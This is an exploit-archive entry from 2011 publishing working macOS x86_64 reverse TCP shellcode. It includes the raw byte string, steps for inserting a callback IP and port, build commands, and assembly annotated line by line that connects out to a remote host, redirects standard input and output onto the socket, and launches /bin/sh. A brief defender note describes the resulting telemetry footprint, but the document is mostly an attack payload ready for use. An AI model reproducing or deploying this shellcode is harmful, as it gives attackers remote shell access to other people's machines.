# Title : OSX/Intel reverse_tcp shell x86_64 - 131 bytes
# Published : 2011-04-29
# Author :
;osx x64 reverse tcp shellcode (131 bytes)
;Jacob Hammack
;jacob.hammack@hammackj.com
;http://www.hammackj.com
;
;props to http://www.thexploit.com/ for the blog posts on x64 osx asm
;I borrowed some of his code
;
;#OSX reverse tcp shell (131 bytes)
;#replace the FFFFFFFF around byte 43 with the call-back IP in hex
;#replace the 5C11 around byte 39 with a new port; the current port is 4444
;shellcode =
;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" +
;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" +
;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" +
;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" +
;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" +
;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" +
;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" +
;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" +
;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
;nasm -f macho reverse_tcp.s -o reverse_tcp.o
;ld -o reverse_tcp -e start reverse_tcp.o
;-----------------------------------------------------------------------
; start  -- entry point of the payload; never returns on success
; Syntax: NASM / Intel, x86-64
; ABI:    XNU x86_64 syscall convention as used below: BSD ("unix") class
;         in bits 24-31 of rax, syscall number in the low bits, arguments
;         in rdi, rsi, rdx; the syscall instruction itself clobbers rcx/r11.
; Flow (visible below): socket -> connect -> dup2 x3 -> execve("/bin/sh")
; Defender note: that exact sequence -- a fresh socket, an outbound connect,
; fds 0/1/2 duplicated onto the socket, then a shell exec -- is the classic
; reverse-shell footprint in process/network telemetry.
; Encoding: the byte string in the header is the real contract (131 bytes,
; no 0x00 byte, IP and port at fixed offsets), which is why the code uses
; 8-bit register writes, the "sub 0xFF" trick and a shift to create the
; string terminator instead of plain immediates.
; Register roles: r8  = running syscall number (adjusted between calls)
;                 r12 = socket fd
;                 r13 = scratch, then pointer to the sockaddr_in on the stack
; Error handling: none -- every syscall result is ignored and execution
; falls through to the next step.
;-----------------------------------------------------------------------
BITS 64
section .text
global start
start:
mov r8b, 0x02 ; r8 low byte = 0x02 (BSD syscall class). 8-bit write: bits 8-63 of r8 are NOT cleared, so this assumes they were already zero on entry -- TODO confirm for the hosting process
shl r8, 24 ; class belongs in bits 24-31: r8 = 0x02000000
or r8, 0x61 ; r8 = 0x02000061 = SYS_socket (97)
mov rax, r8 ; rax = syscall number
;Socket
xor rdx, rdx ; rdx = 0 -> protocol = 0
mov rsi, rdx ; rsi = 0
inc rsi ; rsi = 1 = SOCK_STREAM (type). On macOS SOCK_STREAM is 1 and AF_INET is 2; the original comment had the names swapped
mov rdi, rsi ; rdi = 1
inc rdi ; rdi = 2 = AF_INET (domain, first argument)
syscall ; socket(AF_INET, SOCK_STREAM, 0) -- note rdi is the domain, rsi the type
mov r12, rax ; r12 = socket fd; no error check, an error return would still be used as the fd below
;Sock_addr
mov r13, 0xFFFFFFFF5C110101 ; sockaddr_in image + 0xFF, so the immediate itself contains no 0x00 byte
mov r9b, 0xFF ; r9 = 0xFF (8-bit write again: assumes bits 8-63 of r9 are zero)
sub r13, r9 ; r13 = 0xFFFFFFFF5C110002; in memory (little-endian): 02 00 | 11 5C | FF FF FF FF. Bytes 0-1 look like a Linux-style 16-bit sin_family=2; on a BSD sockaddr_in that is sin_len=2, sin_family=0 -- NOTE(review): relies on the kernel tolerating that, confirm. Bytes 2-3 = port 4444 (0x115C) in network order. Bytes 4-7 = 255.255.255.255 placeholder address (the header names its byte offset)
push r13 ; only 8 bytes are pushed; the remaining 8 bytes of the 16-byte struct (sin_zero) are whatever already sat above rsp
mov r13, rsp ; r13 = &sockaddr_in
;Connect
inc r8 ; r8 = 0x02000062 = SYS_connect (98)
mov rax, r8 ; rax = syscall number (must be reloaded: the previous syscall overwrote rax)
mov rdi, r12 ; rdi = socket fd
mov rsi, r13 ; rsi = &sockaddr_in
add rdx, 0x10 ; rdx = 16 = sizeof(sockaddr_in); relies on rdx still being 0 from the socket call -- presumably preserved across that syscall, verify
syscall ; connect(fd, &addr, 16); result ignored
sub r8, 0x8 ; r8 = 0x0200005A = SYS_dup2 (90 decimal; the original comment's "0x90" was the decimal value written with a hex prefix)
xor rsi, rsi ; rsi = 0 = first fd to redirect (stdin)
dup:
mov rax, r8 ; rax = SYS_dup2, reloaded every pass because syscall clobbers rax
mov rdi, r12 ; rdi = socket fd
syscall ; dup2(fd, rsi): fd rsi now refers to the socket; rsi must survive the syscall for the loop to work
cmp rsi, 0x2 ; CF=1 if rsi < 2 (unsigned), ZF=1 if rsi == 2
inc rsi ; next fd; inc leaves CF untouched (add would clear it) and clears ZF here since the result is never 0, so only CF reaches the jump
jbe dup ; taken only via CF, i.e. while the fd just duplicated was < 2; the pass for fd 2 has already run, so fds 0, 1 and 2 all end up on the socket
sub r8, 0x1F ; r8 = 0x0200003B = SYS_execve (59)
mov rax, r8 ; rax = syscall number
;exec
xor rdx, rdx ; rdx = 0 -> envp = NULL
mov r13, 0x68732f6e69622fFF ; "/bin/sh" with a 0xFF pad in the low byte (keeps the immediate free of 0x00)
shr r13, 8 ; drops the pad and shifts a 0x00 in at the top: memory image becomes "/bin/sh\0"
push r13 ; path string now on the stack
mov rdi, rsp ; rdi = "/bin/sh"
xor rsi, rsi ; rsi = 0 -> argv = NULL
syscall ; execve("/bin/sh", NULL, NULL); on success the process image is replaced, on failure execution runs off the end of the payload into whatever bytes follow